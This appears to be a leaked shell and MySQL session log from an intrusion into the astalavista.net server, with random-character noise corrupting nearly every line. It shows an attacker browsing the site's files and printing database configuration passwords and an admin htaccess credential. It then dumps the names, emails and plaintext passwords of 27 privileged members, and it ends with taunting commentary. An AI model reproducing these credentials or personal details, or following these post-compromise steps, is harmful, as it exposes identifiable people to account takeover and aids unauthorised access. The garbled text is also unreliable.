0 F+ Y6 V4 m# c) |* Z" a! v9 Etotal 48; a3 Y  l2 u7 j7 V% h  N/ a
drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
+ x  A. G8 X4 t: e: g7 O4 X! ?& Idrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
8 O/ f" r1 T# y+ p# Ydrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
# h- k, H3 S  r% x' j-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history
1 c; O% K  t+ \  P-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout# c- R- Y" g9 ?% g
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
6 v2 f' e: c' y-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
4 I% s8 l. a7 hdrwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
% u. e* p4 x6 J: x, e' T9 Odrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap- ]" b  w# F% `2 [$ P7 {
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
$ a; j# R9 S, Z% Z9 ?lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html. z5 \2 h+ _* h0 q* e/ V
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow' x/ a1 f$ m  g

7 a' \( `" M1 h+ v! t: ~0 Vsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
0 R  u& H" w4 e' Ysh-3.2$ ls -la3 t6 L: r8 ~6 I. L
total 200' H4 S" d8 X" w8 B% v( l6 Q2 y
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ." ?) S& s8 [/ v' O
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
5 R; }' i& h7 K& U% W  _drwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007
; a# U/ Z3 |9 Y9 i& odrwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql
5 I5 `0 c1 Z6 P8 T8 p$ v  F$ v6 zdrwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com1 w; ~' j# z$ |( k' l( Y/ g3 J
drwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
! u' Z) G: o; ~& W8 M. }5 ~drwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner- w. L3 g3 q$ K( \, c3 C
-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg
7 j! M/ ?: @; p! {drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config. K& |( U( _$ `4 R! s- \. j1 U9 t! y
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
, f4 n" V0 z; Z0 V7 @- Q9 Odrwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd( X7 Y/ m  B, ~) S" H/ w: C1 N, d
-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php7 i) Y) @7 M+ D% C9 S" L5 f  C. Q7 Y
-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico
8 Z3 ?, J! B5 a, ]% ldrwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed. X# w" |/ N' ?6 q' [; O
drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
2 u7 Q8 g; u& l& x% W, c! n, ~-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
  C4 u8 a* k, Z1 \  K3 G: v8 F8 y-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess) K* L8 S! L/ }2 L$ w# y/ a; u
-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php
* V3 e0 F, c: Y& h1 y: [- o2 [8 |-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html# N& T, ~& n2 K
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php& k% d" l9 K/ j, J
-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php
' ~5 e7 O, r; W) [" L7 k/ z4 \-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf
+ {" x7 R( d/ C. L" o% xdrwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
1 ^$ J& Z, J  J2 f3 z9 bdrwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
# @+ g3 ~! C/ L8 b' M' Odrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib
7 F% G, O, P$ p& U3 cdrwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
7 [. U+ X2 k+ ]$ J# g8 z  u0 Hdrwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
% {, a  V: |) M0 \5 ?8 [" \! ddrwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata- C8 w! v& T2 A! }; B
drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new; P# n) U0 ?) N' x
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf0 i8 l* a# ^* ~/ A$ J
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re+ H4 Y6 R5 U- m5 ]2 C$ _
-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
3 c+ n% l# \: u6 Idrwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss4 \2 I: J7 z" ~! L% b. Z
drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
& g9 g5 X6 E1 d$ Z' U. d6 W: f$ }drwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com9 ]' J5 P- p* k) x8 `
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes
1 b7 |) M( Y# a: h5 Q# Udrwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src
* g3 ~& I$ _! d; X& V" Adrwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl
& {# Z) n+ W+ C- _* R8 H0 W, a- bdrwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
6 m( j6 o% P: S/ O; G2 `drwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old6 F9 b* i; I% x# g% i0 a
-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php: S2 Q( ]1 I# Y: T
drwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
% `* ], a6 z% G' p* U& r. ?9 v: R5 n# p/ n- i, s- ]+ [, y
sh-3.2$ head -20 index.php
* C/ \" @& ~+ b, a; R; r- h5 `- N' X* K. D<?PHP2 f& h5 Q7 s1 Y2 P8 U
/**# o7 Z* v) @, M5 \, Y( I' c+ Q
* Mainfile (external) for astalavistaNET v2.0
% J4 g5 o: v8 Q* ~$ Q: v+ V*
* n. x- U* d: M( c: D: X! F* @copyright     Astalavista IT Engineering GmbH
8 H; a" W4 Q. b6 y& k* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
7 _9 `( [. f6 y8 y" Y! F- P3 P* @version       1.0
/ Q; x, Q/ S0 p" U- B- u3 l! Y2 f& W*/( M% h0 D0 L  Q4 [& h
; p) O0 y" |6 L- d0 L9 ?! l1 ]' x' H
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {7 R6 q) [' g$ e' s6 g- P) m+ @
                $dontStartSession = false;) G: K1 l  c5 }: F1 s
        } else {
9 o$ G: B2 `, O! Q                $dontStartSession = true;
: g8 k5 H3 S6 S# S, Z2 Q( n        }2 f, \* e3 M2 E, D/ l- b
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
/ w1 Y! R; n6 Q( p, U. f        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
& X1 v5 _" G0 \" |" R, }        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);0 z8 R- K4 t6 v7 n3 i# H
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);6 \$ m3 ~0 O: g& |3 b7 D3 c# z
: x# a( Q. Q- W. ^; H( w( v$ g
sh-3.2$ cd config* l0 ~: w1 j  T) |4 ^1 _" |
sh-3.2$ ls -la
0 z2 Z$ v5 F" n( b1 [9 P& }total 32+ ^  Z! O3 G( W/ _/ V  c) F
drwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .2 V" E$ p/ r, B/ k! x
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
" Y+ B4 w3 V  d4 v-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php- ^2 e% ]/ B7 |8 w2 M: O3 N/ r; T
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php
, w" v- x* r& D$ D% C-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php
6 S6 I: S1 M5 g7 n1 n8 f-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php- O, V( N' l7 V6 h* Y" ]
-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php! M" g6 S* x1 F' ^% d  x, y4 V
$ E  q1 s7 u  `
sh-3.2$ cat com.conf.php0 _1 ?4 h+ b( J' K2 }- t
[snip]
2 P; ]8 y/ S/ }9 T) y//member-database7 z6 p2 k1 Q' N/ ^5 C% @. a- c: k
$_CONFIG['db_mem_server']       = ‘localhost’;
" p. i# f  m# w! }, D% ^$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;: |+ Q# C' n, p' V$ P' D! {  N0 l
$_CONFIG['db_mem_user']         = ‘astanet_db’;
. O6 S$ M0 [9 [$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;) ]- n" }3 {8 ~/ i- `! e
$_CONFIG['db_mem_debug']        = false; //true or false
& m3 O! h( z; ~5 b. j( N: p% X. _//ads-database/ l6 ~& `  }5 d9 }
$_CONFIG['db_ads_server']       = ‘localhost’;
$ {! A% h. m# Z/ ~: O7 t$_CONFIG['db_ads_database'] = ‘astanet_ads’;
% K, b. F1 U# o$_CONFIG['db_ads_user']         = ‘astanet_db’;
* f1 @" e0 _  ]: b9 j# J$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;# y7 l8 c/ N' K% h1 i* ?3 z( L' H' g
$_CONFIG['db_ads_debug']        = false; //true or false
8 Y& R, y3 ?! q% ~' ]2 F/ k' G//rainbow-database
: k4 g; k: o: `, w; Z$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;% k, B5 `4 J9 r1 Z
$_CONFIG['db_rainbow_database'] = ‘rainbow’;3 x1 o. {. u% l; Q* u4 u$ X
$_CONFIG['db_rainbow_user']     = ‘dinu’;
4 g& j" a2 w# \, P$_CONFIG['db_rainbow_password'] = ‘dinudinu’;5 w) p- t5 S$ p1 d* n0 C$ k
$_CONFIG['db_rainbow_debug']    = false; //true or false
$ a$ H& Q# s4 e; {//mailing lists database
% Q' w. P' z' F+ c$_CONFIG['db_mailing_lists_server']     = ‘localhost’;
9 e% R5 D* X# c0 j2 k+ M$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;, D+ b1 X$ M7 S# @% e
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;, J4 p7 \5 d0 E$ p* q8 ~: k+ P
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;
. F) V% W( B; J% p$_CONFIG['db_mailing_lists_debug']              = false; //true or false
+ c# \- P5 c% ^$ {  j//paypal8 X4 W2 `% k8 g# R9 j  ~- r. d# k6 F
$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;, {# D2 G. D  U) P
$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
+ o2 k% ~( O! k+ t7 f$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
  G- e4 b! J5 O- Z+ M: e$_CONFIG['sub_pp_noship']       = ‘1′;# g% F, y. D4 g7 n: k
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;
+ {; ~) x; L  b* R/ I. W[snip]
2 S2 b6 m6 O; g3 K1 T3 i
4 i- }9 z. t, O, Qsh-3.2$ cd ..
( P1 V8 ?0 A/ @sh-3.2$ cd member
5 R' N4 N" a/ a4 K% Wsh-3.2$ ls -la( L  N' S; c# n# X( h
total 20
( c( S' M  O! [( Wdrwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
: z6 S4 h5 }' [drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ../ X  i: X) m% R2 Q7 Q; U
-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess
0 z/ {) ?* ~% j1 F( z, N3 |-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php  K6 J8 G* m3 u5 q, I
sh-3.2$ cat .htaccess* L8 [% W- I! _* \% X, j/ I
SecFilterEngine off
. C3 b. T. W7 J' |: e9 a
& @+ F- N1 a6 P# Z3 l# O6 G$ Bsh-3.2$ cd ..7 Y; K7 f+ }- N
sh-3.2$ cd cron: t2 f+ O2 z" _0 I6 r7 t8 b
sh-3.2$ ls -la
* d; B; B, T0 ]1 E0 q# ntotal 168
" p) I, ]) |$ j8 Gdrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .& y) b2 q; p% [6 m3 F2 J6 K
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
6 ^8 z, q* D% G' m7 ^( H. G3 W-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php: K* ^& G+ @+ y" a
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php
0 e  o! A2 A& o- S' h-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php
1 }' X  E5 `& R& ?, G-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php4 z2 j: N& J7 {, K+ f- G6 a
-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
6 P/ x: W2 a" e5 x8 L-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php
: z. ?, g  Z" [9 i-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
2 W! ]8 I4 H+ B) Q: u/ E-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
/ J) O8 {0 b2 [1 {-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh/ L& k( \7 c. N/ y, S$ r
-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
$ U: ?9 z1 z2 F" r-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php
, ^4 }% b. {; T( @-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
3 T( n* s8 E6 B2 A! @-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh8 s/ ?1 _8 ?" u' D
-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php; E3 ]# X5 |: T& g: i/ t/ N
-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php( [+ q  r6 o* G
-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php8 h* c3 t! q3 p* ^  i; D: w. _3 ]
-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php
$ N, t# I/ o' s; F/ S& ^-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php
! _( B9 N0 O9 q) ^9 adrwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
% w! \5 U5 V7 w9 ]-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
- G/ C3 L8 T) q" d% |2 o-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
9 l7 S7 S$ n. g$ T0 v* O& I4 U  [, [  {1 J/ c& J% [
sh-3.2$ cd ..0 g: Q! E: H, s# n8 \
sh-3.2$ cd _007
. H4 V: a& R- `sh-3.2$ ls -la: b% m' s$ b2 U
total 24
6 X$ `, l. a$ v+ o" \" zdrwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .5 e. ?% @* @- Z3 o$ q
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
( H6 b0 \4 x1 k  Z. u( [-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess
& \) @4 H0 F( k5 h8 o: ?-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php
+ P% z; ?: u0 T8 z-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
8 I" }- F8 C* ^' t9 N" K- y7 e6 j, [% vdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap6 E) T( K$ S" B. M3 o7 t
* _5 S* k+ A2 K  M
sh-3.2$ cat  .htaccess# ?9 ~; g" e9 U0 k* Q# M0 B& M
authType Basic
$ o5 O* M9 X) f8 CauthName Admin4 ~- f7 U" A  M1 _, i
authUserFile /home/astanet/auth/.htadm_pwd4 l( u* ]) P: A
require valid-user
$ K, C( Q$ A2 C, t) E! a3 v  `+ i' D! i: W8 N: x
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
) F2 l  A4 H& P( D* p# c0 Eadmin2net:CR0bl65MwhfT4 K/ a9 Q9 v' {
" p1 l% y+ d# I% G) m) [( K+ ^
sh-3.2$ mysql -u astanet_db -p; @8 B  d6 r. p# n6 ~8 k3 {! G, i# F
Enter password:
; S, g; N# D$ ]. `" s1 TWelcome to the MySQL monitor.  Commands end with ; or \g.
8 p, V2 R6 Z: EYour MySQL connection id is 275153
+ z& g# ]$ k' [Server version: 5.0.45-community-log MySQL Community Edition (GPL)8 b+ q, g2 \( F" N. N. e0 ]

- V. Q- x7 p3 ?% cType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 S/ m% }: d9 E  F! S) q- |- Z
3 Y1 X$ x- h% p% L8 N0 b9 ~
mysql> show databases;0 W" L7 j/ K) R$ C6 S5 c  m
+———————–+
0 A& F! C! b3 x" b. R6 ~: |8 y# p| Database              |8 k4 W2 |2 Y+ i# {& l
+———————–+9 A. Y/ K7 C# @# m
| information_schema    |
) L. n! B; f9 u1 J3 x& O* f| astanet_ads           |
/ t3 V. Y+ [# T/ P2 ~| astanet_mailing_lists |
. D) H5 P- |& J4 H/ y! ~/ m| astanet_mediawiki     |! I- @6 P! |8 l2 {$ k
| astanet_membersystem  |1 U) P$ Q: i" Z8 v8 O
| test                  |
' c$ e* _8 Z  {+———————–+. y0 }# U3 `4 {& ~% r  u: w5 k4 U
6 rows in set (0.00 sec)
, `9 s1 i: c' j% Z
( c% e( H' R3 Fmysql> use astanet_membersystem1 ?) z  s: M2 G* }! w
Database changed  ^. B) i$ t8 W! c2 f7 R  s
mysql> show tables;
% J: Z) u$ r$ k/ F+———————————–+
5 P$ d7 E; V0 r| Tables_in_astanet_membersystem    |
1 B2 X3 ]* @* y2 r5 \* |+———————————–+
$ H. m: H( r+ X! p9 q| blacklist_categories              |7 j8 _# E1 i3 x0 H; W
| blacklist_content                 |& T' u7 L# V( w! s6 n% h/ R' n" `
| blacklist_levels                  |) j8 }: \2 ]0 W( a
| blacklist_mcset                   |: D0 |2 _7 e# c. W
| dir_categories                    |
1 ^; ~+ ]1 T4 S+ \# b  P| dir_comments                      |
: L5 W  `1 W1 q% S| dir_links                         |7 {8 z& ^  }' t6 C2 [/ n8 b
| dir_temp                          |& ?5 z  `9 S5 ]) y
| dir_votes                         |# }( y4 s& Z/ b$ G( y8 Q
| documents                         |( v4 D7 s' N( G
| documents_categories              |" {' o  T9 y0 U6 t/ D
| email_content                     |% G3 \) g6 m% p6 z) u# F
| email_settings                    |' n1 I' e3 _( ^
| exploits                          |
: A: H& y% K  F3 e: H| exploits_categories               |
# Y$ t7 h6 d" O6 J0 X# y8 C| exploittree_categories            |% c. Q) |) }5 M6 J
| exploittree_exploits              |( U3 O* y, [0 [) S
| home_values                       |
  C6 j8 c8 |3 d# K, b| iso_countries                     |( \5 s% R; P& Q. X5 {( o; h
| links_categories                  |
! q5 M/ t7 K. [$ o' W| links_records                     |
4 v2 W5 [1 g% D. K| links_unauth                      |# _1 y* d9 O! R# N8 S" Q# }
| links_votes                       |! C# S6 K, N2 i$ u2 L
| log                               |" ?3 s# Z& G8 X. f
| news_categories                   |
2 S; l, g8 n' t$ I! L1 p| news_comments                     |% ~4 Y& u1 P& h$ f8 @& T7 b( K1 G
| news_emoticons                    |! |, q7 J6 n6 _, _
| news_latest                       |0 E. G; R- a  T0 X3 m
| news_messages                     |
& l* F1 R2 n9 {$ N# ^| news_statistics                   |
/ ~2 t0 P* y" f" W+ F| news_votes                        |  K* _2 S# H! h. X
| prices_content                    |% G6 L8 g! [0 i% E
| prices_offers                     |' l# z7 S9 k( Y6 Z7 ]2 V
| rss_settings                      |: W$ ?# z% @9 {" E: _/ l6 s# l- b, D
| sessions                          |
, H& V- d/ b- d$ @0 d0 W1 || stats_signups                     |
! v  s" }( ?; m| u2u2                              |3 r- I8 T/ d4 n6 L/ D
| u2u_contact                       |0 a% d2 f0 _+ V- b6 W4 H
| u2u_settings                      |. U) ]  q8 ~- Y3 w
| user_keywords_selected_categories |+ r7 l- @2 n  j  v8 |* {
| users                             |) ?3 f# x9 w8 u- E9 r
| users_ipn_test                    |
% u' G4 {1 |) Y, K' ]| users_keyword_values              |0 G4 I- _0 H- s' X1 W4 Q
| users_profile                     |
4 M6 ?9 F. R# s- W+ R| users_temp                        |
" r- X- H( ]5 \! m: d| users_upgrade                     |0 I6 t" C* }4 e/ E  C( h
+———————————–+( `( S1 [8 @  v) |4 y8 Q
46 rows in set (0.00 sec). V. T; J5 T+ R5 v: v
( t# r7 N+ X" n+ D1 O+ w' b
mysql> describe users;$ K- n+ z3 j' k5 ?& t
+————————–+————————————–+——+—–+———————+—————-+
0 ?- c2 Y. x4 ?: h+ v3 u  J( N" o0 ~# R| Field                    | Type                                 | Null | Key | Default             | Extra          |5 {6 K+ F- `% l& L# s" H& x
+————————–+————————————–+——+—–+———————+—————-+/ m8 B: m- W( m: `+ g9 q$ w
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
7 r% `8 n3 x1 o/ P' Y; a0 P| user                     | varchar(50)                          | NO   |     |                     |                |
# g2 t5 O7 r, d' ?8 f+ i7 Z- p4 o; y| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
+ Q  C) I! y4 j; c4 b0 g" G! Q( R| password                 | varchar(30)                          | NO   |     |                     |                |- E  O. V+ v+ L" a6 Z, H6 J5 K
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |3 {, r- z' f* c$ N% ?3 }6 a
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |  @( v; a# L, h- g
| email                    | varchar(50)                          | NO   |     |                     |                |
3 P$ L% _1 ]+ t% `3 a( q( O5 k| ip                       | varchar(15)                          | NO   |     | 0                   |                |, M  t3 f! B1 p! z5 v
| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |& \( U! b: b  D; |3 ~
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
& w& B" h8 n: X7 j# f( j2 w- Q/ c+ w| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |  \! m( J, N5 h3 }9 |! a- \$ C
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
- ]: p2 f' G% \, S6 ~| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
+ T2 `, V8 w# f| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |
: A: I5 ^5 |4 r' z% |2 v| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |" J; `" k" \+ [5 a6 A
| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |
% ?! R  Z; e$ N+ ~* r| lang                     | tinytext                             | NO   |     |                     |                |* a5 r6 S: j$ x. e$ ]5 v2 y  |3 p
| adid                     | smallint(6)                          | NO   |     | 0                   |                |
6 |" `; k( b& M4 n5 Q| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
* Z4 ~& n/ u# L) M& P8 J7 c1 v, _| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |5 Z& P# R; e9 I: l: G
| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
! N* [8 A/ ^6 l  l2 i9 r& F. M% q| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
2 L' ]" N, @5 M8 E! N0 C9 e# R+————————–+————————————–+——+—–+———————+—————-+
* f; L& W& p0 ]" T  m/ \22 rows in set (0.01 sec)
  o% c( r! O* v! S+ C6 Z
% c4 g6 [  T5 h4 F* R5 a- ~mysql> select count(*) as skids from users;1 k) X& j0 f( ^9 C2 p/ E2 l* k( ~
+——-+$ D! j! [7 |/ B* `, j9 @$ X
| skids |
5 \( X4 M7 A) q# j8 U3 _, H# T- S  Z+——-+
! v1 v% c% F! G7 q  |' W| 25199 |
0 N( ^0 j- i, J. D+——-+, \* N$ C' \4 }
1 row in set (0.00 sec)
0 }. |. x, a1 F* \: P$ v% O' }/ u& o7 ]% l5 O
mysql> select user,nickname,password,email from users where userlevel = 1;6 j( C- _4 ]6 F6 f0 A( W% ^% O
+————————–+———————-+——————+———————————–+
+ n6 J$ B/ W0 N; j) l0 r2 Z% `| user                     | nickname             | password         | email                             |" v! X& {! Y$ [& C- B; ?
+————————–+———————-+——————+———————————–+
$ a  P. Q# K5 k- _+ O* t| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |# K; O0 B  u" p
| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |
" I. Y4 ^' d9 A" R" a/ E9 z8 Y| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |4 S6 ~+ K: [9 D% h6 h- _
| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |) Y2 t" \2 C! T# i. N9 k3 K+ [. P
| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |; p7 C* K( G6 S7 r
| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |5 p! O' h& j2 W2 x
| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |/ d( f# Z4 m! y8 R7 i- J/ ^
| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |- T( j# p5 g3 z$ Y% [$ j7 X
| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |. u, s( N: T; V
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |- h! g. M7 V& F" a* z
| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |
( ~5 B2 a* r* o+ p| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |" Z5 F  I/ H) k; R8 \6 ^
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |
$ d/ L/ `5 o. L' j, }| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |2 L+ a  y8 k- n: J
| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |0 ^( y2 W9 Q1 E7 j
| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |
) Z8 t: ~# q1 L! s| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |: ^0 y, k0 d, L4 [& c
| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |. [( I4 X, [( \! K' d
| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |
. f& t) n' c' b9 L' D| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |
2 M* S) F* r4 H! ?5 e| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |
1 ?+ A/ q( I8 Y4 |: y3 ^+ H| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |/ ^( n. Q) S4 j- M
| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |( o2 f$ W/ v# d; F5 B* Z* K) f
| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |
9 m. |( s5 B8 M! A, w  r| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |. g3 {8 c6 j8 w- C) y
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |. ^& F, t8 l, X6 F6 |
| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |* I. ^( M1 o' G* U
+————————–+———————-+——————+———————————–+( F$ w, Q+ j5 J4 Q4 [
27 rows in set (0.00 sec)2 W1 r4 m! j1 B% F' y1 b

- P" D2 q' J* O0 v' omysql> exit;
: S, n9 ^7 g. {! n( q- ]Bye
8 j. F# C9 D" C$ u9 }
( J# K; P* X* N* O: N, w8 C2 O[~] plaintext passwords? yes,2 {+ L0 Y! F& C0 e- q
Those so called “security professionals” who charge you $6.66 / month to# Y6 J# y1 V( Z; c" D
register at their hack-proof portal, save your passwords in plaintext…3 Q$ ~& N; y& v- D
brilliant!
3 L6 {. x' U- a' p; I7 }
5 b9 N6 w1 S) e: E, j, d[~] This been fun but we want more.& k) ~! ~9 {8 u7 I3 o9 r

